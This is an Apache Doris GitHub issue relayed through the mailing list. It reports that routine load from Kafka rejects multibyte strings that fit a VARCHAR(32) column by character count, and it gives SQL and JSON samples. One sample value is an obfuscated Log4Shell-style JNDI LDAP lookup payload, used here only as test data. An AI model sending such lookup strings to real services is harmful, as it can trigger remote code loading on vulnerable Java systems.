123shang60 opened a new issue, #64334:
URL: https://github.com/apache/doris/issues/64334

   ### Search before asking
   
   - [x] I had searched in the 
[issues](https://github.com/apache/doris/issues?q=is%3Aissue) and found no 
similar issues.
   
   
   ### Version
   
   doris-4.1.0-rc03-5960d4cea0e
   
   ### What's Wrong?
   
   我在 Doris 中创建了如下的表
   ```sql
   CREATE TABLE test_table
   (
       `env` VARCHAR(32) NOT NULL DEFAULT ''
   )
   ENGINE = OLAP
   DUPLICATE KEY(env)
   DISTRIBUTED BY RANDOM BUCKETS 1
   properties(
       "compression" = "zstd",
       "enable_single_replica_compaction" = "true",
       "replication_allocation" = "tag.location.default: 1",
       "storage_format" = "V3"
   );
   ```
   
   同时开启了一个 routine load 任务
   ```sql
   CREATE ROUTINE LOAD dwd.test_table ON test_table
   COLUMNS(`env`)
   PROPERTIES(
       "format"="json",
       "strict_mode"="false",
       "max_filter_ratio" = "1",
       "timezone" = "Asia/Shanghai",
       "max_error_number" = "5000000",
       "max_batch_interval" = "10",
       "max_batch_rows" = "5000000",
       "desired_concurrent_number" = "8",
       "load_to_single_tablet" = "true",
       "exec_mem_limit" = "8589934592"
   )
   FROM KAFKA(
       "kafka_broker_list" = "127.0.0.1:9092",
       "kafka_topic" = "test_load",
       "property.kafka_default_offsets" = "OFFSET_END",
       "property.group.id" = "test_load_doris"
   );
   ```
   
   之后,我向 kafka 中发送了一个消息:
   ```json
   {"env":"${jnd${upper:ı}:ldap://test.comxxxxxx}"}
   ```
   
   这个 json 中, `upper:` 字符后有一个特殊的 `U+0131` 字符;此时 Doris 的 routine load 任务会出现如下报错:
   ```
   Reason: column_name[env], the length of input is too long than schema. first 
32 bytes of input str: [${jnd${upper:ı}:ldap://test.com] schema length: 32; 
actual length: 33; . src line []; 
   ```
   
   同样的,导入如下的中文字符,也会出现问题:
   ```json
   {"env":"中123456789012345678901234567890"}
   ```
   
   报错如下:
   ```
   Reason: column_name[env], the length of input is too long than schema. first 
32 bytes of input str: [中12345678901234567890123456789] schema length: 32; 
actual length: 33; . src line []; 
   ```
   
   ### What You Expected?
   
   能够正确的按照 varchar 定义的长度截断字符串,并成功导入数据
   
   ### How to Reproduce?
   
   _No response_
   
   ### Anything Else?
   
   _No response_
   
   ### Are you willing to submit PR?
   
   - [ ] Yes I am willing to submit a PR!
   
   ### Code of Conduct
   
   - [x] I agree to follow this project's [Code of 
Conduct](https://www.apache.org/foundation/policies/conduct)
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]


---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to